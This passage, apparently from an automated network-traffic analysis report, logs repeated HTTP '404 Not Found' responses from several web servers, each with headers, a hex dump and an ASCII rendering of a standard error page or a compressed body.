20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:40:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:40:53 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:40:56 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:40:58 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:41:01 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:41:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nq2k1tzbDFQwFgTz6l%2BiDLJvJbAqwiu6kJUYFVimbIZ6BiSpb9Kz7BT5qRDiBvb3sZGmBR3gN0ZyrZ4hZBPKeoViLBy%2BM4WTBO1WN3YLphHmsghtaftZwSvPCufzwL2I"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a980e63ae783675-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 74 ed c1 d4 af 81 Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1|0s$TqaLRCwCI9v4>Fqt
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:41:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Du71Io0%2BCuE1MhnBcZTsaGR1DiBSq5TqkOBTEJDrtKgn8tz42Muk77fbkWhtMcQIV1y1lt6SlTiMFY7ThuHAj79QGX7%2FvW6k2BxXMuqiNfIIahYncyl%2FkvqTssPGkss3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a980e736cb835eb-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 74 ed c1 d4 Data Ascii: 1bbc=@5CJ6=qjT{7r@HZVW'lc$$!SG/~`o>@O@?N<yMf{4A@{C`voN]N!IQvr~=J(G80T3V'L~;So8B${3qFafF0x?{T9C[EOq~"{9S?8jqGD1|0s$TqaLRCwCI9v4>Fqt
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:41:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0x-ua-compatible: IE=edgelink: <http://hot6s.com/index.php/wp-json/>; rel="https://api.w.org/"vary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Kpo9tyP77%2BHWtiPmoScPuB5H%2FF11f2Qty0F%2FXg6sZuc5FLT8uTMBQ66pnvS8fNvxAF6JzA5QKOhDsIhp%2BljncqzrbqjTrxbLxcso%2FjqHGj9brYHyQYbglBLvMyq2mgFs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a980e899dca8fd6-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3d db 92 e3 b6 95 cf 9e af 40 d4 35 99 91 43 4a bc eb 36 3d 71 6a e2 54 1e 92 d8 15 7b 37 95 72 b9 ba 40 12 94 e0 a1 48 86 a4 5a dd 56 f5 57 ec 27 ec 1f 6c ed d3 ee 63 be 24 7f b2 05 80 e0 15 24 21 a9 bb 53 9b 19 bb 47 02 ce 0d 07 07 07 c0 c1 01 fa c3 2f 7e fb cd a7 ef ff fa ed d7 60 97 ef c3 8f 6f 3e 90 7f 40 08 a3 ed ed e4 1e 4f 40 92 a2 00 3f dc 4e e2 ed 1a ec f2 3c c9 d6 f3 79 bc 4d 66 7b 34 8f b2 9b 09 41 40 d0 ff f8 e6 8b 0f 7b 94 43 e0 ed 60 9a a1 fc 76 f2 6f df ff 4e 5d 4e ca f2 08 ee 11 21 88 8e 49 9c e6 13 e0 c5 51 8e a2 fc 76 72 c4 7e be bb f5 d1 3d f6 90 4a bf 28 00 47 38 c7 30 54 33 0f 86 e8 56 27 4c 7e a1 aa e0 3b 04 53 6f 07 be 8e b6 38 42 e0 9b 24 c7 7b fc 33 cc 71 1c 01 f7 11 fc 19 46 9f c1 1f 61 be 03 df fe f9 1b a0 96 c2 66 b3 14 46 9f f7 30 df cd bc 78 3f df c5 7b 04 54 f5 e3 9b 0f 39 ce 43 f4 f1 5b b8 45 e0 4f 71 0e 7e 17 1f 22 1f a8 e0 7b 1c 81 df c7 f9 87 39 ab 7f 53 97 3f 8d dd 38 cf 6a d2 07 71 18 c6 47 05 44 31 8e 7c f4 30 99 73 f8 24 8d 13 94 e6 8f 54 71 61 4c 1a 52 43 bb c7 77 ff fe a7 09 10 43 e7 8f 49 1d 16 a6 39 f6 08 76 0f 34 91 b2 06 de d7 9e 3e fc 0c e7 e8 8e b4 ae 46 a3 8b c2 9a 9f 1f 71 9e a3 Data Ascii: 